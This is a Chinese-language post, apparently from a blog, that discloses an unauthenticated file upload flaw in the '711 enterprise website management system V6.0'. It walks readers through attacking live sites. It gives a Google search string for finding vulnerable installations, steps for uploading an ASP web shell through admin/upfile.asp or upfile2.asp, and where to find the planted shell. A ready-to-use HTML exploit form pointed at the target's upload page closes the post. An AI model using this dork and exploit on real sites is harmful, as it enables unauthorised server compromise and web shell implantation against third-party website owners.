`

711企业网站管理程序V6.0再爆上传漏洞及利用

阅读更多

前些天出了个Cookies注入漏洞,今天又翻了看了下~  

在ADMIN目录有2个上传文件upfile.asp和upfile2.asp  

这2个组件的功能就是:无需登录后台,无需截包,直接本地修改代码就能上传asp文件,无语中。。。。  

另外,更可爱的是写这套程序的还为我们编写一套可用万能密码直接登录的后台。据谷歌报道,存在此套系统的用户多达1,050,000 。继续无语中。。。  


1,谷歌里写上inurl:List.asp?Shop_ID  
2,如果网站存在以上上传文件,90%能上传asp文件。 
3,将图片123中地址替换成自己检测的网站地址即可 。 
4,在选择图片文件里直接上传asp文件。 (其实能上传任意后缀的文件。) 
5,打开网站首页,寻找图片真实地址。一般shell地址为
http://www.XXX.com/pic/XXXXXX.asp  

罗嗦一句,上传组件不是有2个吗? 一般管理员会修改或者删第一个upfile.asp,第二个也是可以利用的upfile2.asp 


如果测试失败。说明此漏洞已经打上补丁。如果没有打补丁测试失败,引用一段话:在一般情况下,某事物个体发生具有自身特有属性的负面现象,而这种现象无法从科学的角度得到合理的解释,但它又确实存在,我们一般称之为人品问题.(RPWT)”   -----------摘自《辞海》第874页  

EXP: 


<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"> 
<link href="style.css" rel="stylesheet" type="text/css"> 
</head> 
<body leftmargin="0" topmargin="0" bgcolor="#CEDBFF"> 
        <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"> 
<form name="myform" method="post" action="
http://www.XXXX.com/admin/upfile.asp" enctype="multipart/form-data" language="javascript" onsubmit="return check();"> 
          <tr align="center" valign="middle">  
            <td height="15" align="left"> 选择图片:  
              <input type="file" name="file1" value=""> <input type="submit" value="上传" name="B1" class="txt " isshowprocessbar="True"></td> 
          </tr> 
      </form> 
        </table> 
</body> 
</html>

分享到:
评论

相关推荐

Global site tag (gtag.js) - Google Analytics